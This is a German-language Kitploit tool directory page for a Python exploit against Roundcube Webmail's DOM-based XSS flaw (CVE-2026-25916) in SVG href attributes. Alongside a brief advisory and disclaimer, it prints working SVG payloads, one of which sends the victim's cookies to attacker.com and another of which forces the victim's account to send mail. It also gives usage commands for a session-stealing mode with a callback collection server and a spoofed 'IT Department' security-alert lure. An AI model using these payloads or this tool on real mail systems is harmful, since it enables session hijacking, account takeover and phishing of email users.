Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute — Python-Exploit für DOM-basiertes XSS in Roundcube Webmail (CVE-2026-25916) über SVG-href-Attribute, das Session-Hijacking und Datenextraktion durch präparierte E-Mails ermöglicht. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitE-Mail-Sicherheit
GitHubmbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute

CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute

Python-Exploit für DOM-basiertes XSS in Roundcube Webmail (CVE-2026-25916) über SVG-href-Attribute, das Session-Hijacking und Datenextraktion durch präparierte E-Mails ermöglicht.

Repository anzeigen
31vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-25916: Roundcube Webmail DOM-XSS-Exploit

📋 Exploit-Informationen

Exploit-Titel: Roundcube Webmail DOM XSS über SVG href (CVE-2026-25916)
Autor: Mohammed Idrees Banyamer
Kontakt: GitHub @mbanyamer | Instagram @banyamer_security
Land: Jordanien
Datum: 9. Februar 2026
CVE: CVE-2026-25916
Typ: DOM-basiertes Cross-Site-Scripting (XSS)
Plattform: Webanwendung
Getestet auf: Roundcube 1.6.8, Ubuntu 22.04
CVSS-Score: 6.1 (Mittel)

🚨 Rechtlicher Haftungsausschluss

⚠️ WARNUNG: Dieser Exploit dient ausschließlich Bildungs- und autorisierten Testzwecken.
Verwenden Sie ihn nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
Der Autor ist nicht verantwortlich für jeglichen Missbrauch oder illegale Aktivitäten.

📖 Beschreibung der Schwachstelle

Roundcube Webmail-Versionen vor 1.6.9 enthalten eine DOM-basierte XSS-Schwachstelle in der SVG-Verarbeitung. Die Anwendung bereinigt die Attribute und in SVG-Elementen nicht ordnungsgemäß, wodurch die Ausführung von JavaScript über speziell präparierte E-Mails ermöglicht wird.

href
xlink:href

Betroffene Versionen: Roundcube Webmail < 1.6.9
Behoben in: Version 1.6.9 (Commit 26d7677)
CWE: CWE-79 – Unzureichende Neutralisierung von Eingaben bei der Generierung von Webseiten
Angriffsvektor: Remote über E-Mail
Auswirkung: Session-Hijacking, Kontoverwaltung, Datendiebstahl

🔧 Technische Details

Die Schwachstelle existiert in rcube_washtml.php, wo href-Attribute in SVG-Elementen nicht ordnungsgemäß validiert wurden:

root@kitploit:~
<!-- Angreifbare SVG-Elemente -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">

```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
root@kitploit:~
python3 cve-2026-25916.py \
  -s smtp.gmail.com \
  -p 587 \
  -u [email protected] \
  -w app_password \
  -r [email protected] \
  -t session_steal \
  --callback https://yourserver.com/collect \
  --subject "Security Alert" \
  --from-name "IT Department"
Tool herunterladen